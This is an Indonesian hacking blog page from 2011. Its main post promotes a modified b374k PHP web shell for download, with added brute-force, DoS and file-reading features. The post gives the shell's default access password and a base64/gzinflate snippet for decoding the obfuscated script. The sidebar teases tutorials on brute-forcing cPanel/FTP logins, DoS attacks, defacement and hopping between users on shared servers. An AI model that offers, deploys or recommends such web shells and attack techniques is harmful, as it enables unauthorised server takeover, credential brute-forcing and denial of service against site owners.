[close]
..::Personal Site::..
Bruteforce dengan shell
sebetulnya teknik ini sama dengan postingan itu sama2 jumping buat ngebrote user dan password cpanel, ftp, ataupun whm oke langsung aja yah : (more…)
Tutorial Dos Attack untuk menjurus ke DDOS
kali ini ane mau buat tutor dos yah tau kan dos kalo belom tau bisa berkunjung ke http://id.wikipedia.org/wiki/Serangan_DoS oke langsung aja yah :D : (more…)
Tutorial buat para jumper
inget pilem jumper yg suka lompat kalo ini teknik sama suka lompat ke user lain satu server oke mulai aja yah tutornya :D (more…)
Ngedit Script b374k
nih scriptnya copas ke notepad terus save dengan file tipe php :D (*yg udah tau pasti ) http://xjamesx.tk/404.txt ngedit b374k biar 4 in 1, ga perlu banyak3 upload cukup 1 file sudah mematikan, fitur yg ditambahkan = bruteforce, readable, DOS, dan pengunaan password untuk mengakses shell tersebut :D (more…)
Steganografi Audio
—Steganografi adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia. —Teknik steganografi meliputi banyak sekali metode komunikasi untuk menyembunyikan pesan rahasia (teks, audio atau gambar) di dalam berkas-berkas lain yang meng...
POC buat ngedeface++
Wah dah lama ga ngeblog kali ini gw mau share beberapa teknik2(POC) buat ngedeface . kalo yang sudah pada tau teknik2 ini jangan pada ngina yah maklum nubie mau coba bikin artikel :p yang sudah baca yah jangan lupa komen2nya yah itung2 belajar bareng :) ok mulai aja deh ke tutor (more…)
Mencegah serangan Syn & Ping Flood Attack (DOS)
1. Mencegah paket Syn Flood Attack (more…)
SQL Injection Flaw Patching
dan diambil dari http://www.indonesianhacker.org/showthread.php?t=529 yang diposting oleh v4mp Jangan cuma bisa attack. Tapi juga harus bisa defend.  Langsung aja.. Ini patch untuk mencegah serangan SQL Injection di halaman dinamis pada PHP + MySQL. (more…)
Web Security Yin-Yang (Attacking & Defending)
WEB SECURITY YIN-YANG Ditulis oleh: gentoo, foobar4joo@gmail.com "If you know both yourself and your enemy, you can win a hundred battles without a single loss." Di berbagai segi kehidupan, sangatlah di butuhkan keseimbangan. Bahkan yang sangat terkenal adalah sebuah ungkapan dari Sun Tzu yang saya tuliskan diatas, mengenali kelemahan musuh adalah penting, tetapi lebih penting lagi mengenali ...
Manifesto Seorang Hacker
Ini adalah dunia kami sekarang, dunianya electron dan switch, keindahan sebuah baut. Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami criminal. (more…)

Ngedit Script b374k

Posted By: admin on February 1, 2011 in ..::james0baster::.., Hacking, Keamanan & Perbaikan WEB, Pemerograman, PHP - Comments: 1 Comment »

nih scriptnya copas ke notepad terus save dengan file tipe php :D (*yg udah tau pasti hmm)
http://xjamesx.tk/404.txt

ngedit b374k biar 4 in 1, ga perlu banyak3 upload cukup 1 file sudah mematikan, fitur yg ditambahkan = bruteforce, readable, DOS,
dan pengunaan password untuk mengakses shell tersebut :D

[Image: 155064_176829012341444_100000430395530_4...8734_n.jpg]

passwordnya = devilzc0de

[Image: 166409_188142117876800_100000430395530_5...9188_n.jpg]

atau bisa ubah sendiri password hashnya dalam bentuk md5 mantap

UPGRADE SCRIPT

http://xjamesx.tk/404.txt

ditambahkan DOS attack

[Image: 164525_188139351210410_100000430395530_5...1231_n.jpg]

NB Script di encode biar ukurannya jadi lebih kecil aja

kalo mau decode bisa make script php ini :

gzinflate(base64_decode($scripygdiencode))

One Response

You can follow any responses to this entry through the RSS 2.0 feed.

You can leave a response, or trackback from your own site.

  1. […] 1. download shell yg ada di sini 2. masukan passwordnya biar bisa akses shellnya […]

Leave a Reply

[+] kaskus emoticons nartzco

..::james0baster::..

..::james0baster::.. (15)
Berita dan Pengumuman (11)
Hacking (11)
Hacking (8)
ICT (4)
Internet (6)
Jaringan Komputer (7)
Java (1)
Keamanan (5)
Keamanan & Perbaikan WEB (9)
Komputer (8)
Local (3)
Pemerograman (8)
PHP (6)
Tips and Trick (6)

WP Cumulus Flash tag cloud by Roy Tanck and Luke Morton requires Flash Player 9 or better.



James Baster Tamba | Buat Lencana Anda


Update status via Facebook for BlackBerry® smartphones

Update status via james0baster




Foto

Put To Your Site



..::james0baster::..


Find me at

CODER - Indonesian IT Community



james0baster on Facebook Jasakom Community - Powered by vBulletin



james0baster on Twitter Logo



Logo

Iklan



Lokasi Pengunjung

free counters

ID Pengunjung

IP

Sponsor

Web Hosting

Logo Pandi

Iklan

Copyright - All Rights Reserved / Developed By james0baster
Get Adobe Flash player